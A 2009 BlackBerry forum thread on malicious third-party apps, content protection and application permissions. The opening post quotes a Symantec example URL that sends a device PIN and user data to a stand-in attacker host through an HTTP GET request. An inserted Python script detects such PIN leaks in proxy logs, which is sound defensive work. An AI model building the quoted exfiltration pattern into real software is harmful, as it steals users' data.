BlackBerry Forums Support Community               

Old 08-26-2009, 03:01 PM   #1 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Blackberry Security (Module Permissions)

I was reading the following article posted by Symantec:

http://www.symantec.com/avcenter/ref...ry.devices.pdf

I found one section to be quite scary:

Data Theft
A user installs some apparently useful application or video game. The application steals the user's information and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9...his+is+top+secret+data


Anybody up on the level of actual attacks downloading third party applications and allowing User Data to be exploited?
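
Added example, not part of the thread or of the Symantec paper: the pattern quoted in the first post, a device PIN carried in an HTTP GET query string, can be looked for in web proxy logs. The sketch assumes a simplified `<client> <method> <url>` log format and an 8-character hexadecimal PIN; the PINs, hosts and log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: a BlackBerry PIN is an 8-character hexadecimal device identifier.
PIN_SHAPE = re.compile(r"[0-9A-F]{8}")
# Constructed inventory of PINs issued to managed devices (placeholder values).
KNOWN_PINS = {"2100000A", "2100000B"}
# Constructed proxy log lines in a simplified "<client> <method> <url>" format.
SAMPLE_LOG = [
    "10.0.0.5 GET http://games.example/upload?&PIN=2100000A&d=this+is+top+secret+data",
    "10.0.0.5 GET http://weather.example/forecast?city=Ottawa",
    "10.0.0.9 GET http://stats.example/ping?id=2100000b&v=1",
    "10.0.0.9 GET http://shop.example/item?PIN=1234",
    "10.0.0.7 GET http://quiz.example/score?pin=DEADBEEF",
    "malformed line",
]

def classify(key, value, known_pins):
    """Return a reason string if this query parameter exposes a device PIN."""
    value = value.upper()
    if value in known_pins:
        return "known device PIN"
    if key.upper() == "PIN" and PIN_SHAPE.fullmatch(value):
        return "PIN-shaped value"
    return None

def find_pin_leaks(log_lines, known_pins=KNOWN_PINS):
    """Return (client, host, reason, extra_bytes) for each GET that carries a PIN."""
    leaks = []
    for line in log_lines:
        fields = line.split()
        if len(fields) != 3 or fields[1].upper() != "GET":
            continue
        client, _, url = fields
        parts = urlsplit(url)
        # parse_qsl skips the empty field produced by a leading "&", as in "?&PIN=...".
        params = parse_qsl(parts.query)
        for key, value in params:
            reason = classify(key, value, known_pins)
            if reason:
                # Bytes sent alongside the PIN hint at how much data left the device.
                extra = sum(len(v) for k, v in params if k != key)
                leaks.append((client, parts.hostname, reason, extra))
                break
    return leaks

if __name__ == "__main__":
    for leak in find_pin_leaks(SAMPLE_LOG):
        print(leak)
```

Matching against an inventory of issued PINs catches the identifier under any parameter name; the shape check only fires when the parameter is literally called PIN, which keeps false positives on ordinary 8-character hex values down.
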
Old 08-26-2009, 07:58 PM   #2 (permalink)
BlackBerryForums.com Super Moderator
 
SteveO86's Avatar
 
Join Date: Sep 2007
Location: Florida
Model: 9650
OS: 6.0.0.280
PIN: I heard it drop!
Carrier: VZW BIS
Posts: 6,534
Post Thanks: 0
Thanked 4 Times in 1 Post

Most applications that attempt to access those RIM APIs will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")
__________________
8830 -> 8330 -> 9550 -> 9650
Just think about how far BlackBerries have come from then till now... And what else is coming.

Old 08-27-2009, 05:25 PM   #3 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 

I wonder if turning on content protection would prohibit the upload of user data? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.
Old 08-27-2009, 06:21 PM   #4 (permalink)
CrackBerry Addict
 
DaBlackberryBoy's Avatar
 
Join Date: Jul 2006
Location: NUNYA
Model: 9850
PIN: URADUMAS
Carrier: Verizon
Posts: 669
Post Thanks: 0
Thanked 3 Times in 3 Posts

I would venture to say that hackers will see this thread and get ideas. I think the best protection is still, know what you install from who. I tend to go with companies that are partnered with Blackberry, which doesn't mean anything, but gives me some sort of sense of peace against stuff like this.
__________________
DaBlackberryBoy
-- http://wardsmitchelljr.com --
Old 08-27-2009, 08:32 PM   #5 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts

Quote:
Originally Posted by SteveO86 View Post
Most applications that attempt to access those RIM APIs will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")
There is a blog management application announced in this very forum that requests Input Simulation (Event Injection) permission to turn the camera off after taking a picture, and Security Timeout for some undisclosed purpose. With these two permissions any application can pwne your Blackberry. Yet when I voiced my concerns I was roundly ignored. So your hope that the blogosphere will protect us is, sadly, misplaced.
__________________
My other Blackberry is a PlayBook.

Last edited by hrbuckley : 08-27-2009 at 08:35 PM. Reason: Spelling
Old 08-27-2009, 08:35 PM   #6 (permalink)
BlackBerry Extraordinaire
 

Quote:
Originally Posted by Preroll View Post
I wonder if turning on content protection would prohibit the upload of user data? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.
Old 08-28-2009, 12:08 PM   #7 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 

Quote:
Originally Posted by hrbuckley View Post
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.
So if I DO give permission to the application to access the User Data and the data has Content Protection turned on with encryption, can that encrypted User Data still be jeopardized I guess is where I'm going with this?
Old 08-29-2009, 10:01 AM   #8 (permalink)
BlackBerry Extraordinaire
 

Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM data.
Old 08-31-2009, 12:44 PM   #9 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 

Quote:
Originally Posted by hrbuckley View Post
Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM data.
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?
Old 08-31-2009, 03:47 PM   #10 (permalink)
BlackBerry Extraordinaire
 

Quote:
Originally Posted by Preroll View Post
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?
Some applications provide added value from accessing your data, if you want what they do for you. The Facebook contact list interface is a good one. You can say no and the remainder of Facebook continues to work.

What is really frustrating, especially with the Wordpress app, is that they have the framework to detect that the user said "No" to a particular permission, and then avoid functions that need it. Instead they (as of my last download) crash.

I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.
Old 08-31-2009, 05:35 PM   #11 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 

Quote:
Originally Posted by hrbuckley View Post
I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.
You mean by going to Application Permissions and changing Default Permissions?
Old 08-31-2009, 07:23 PM   #12 (permalink)
BlackBerry Extraordinaire
 

Yes. For installed apps you will/may have to go and change them individually.

Copyright 2004-2014 BlackBerryForums.com.
The names RIM and BlackBerry are registered Trademarks of BlackBerry Inc.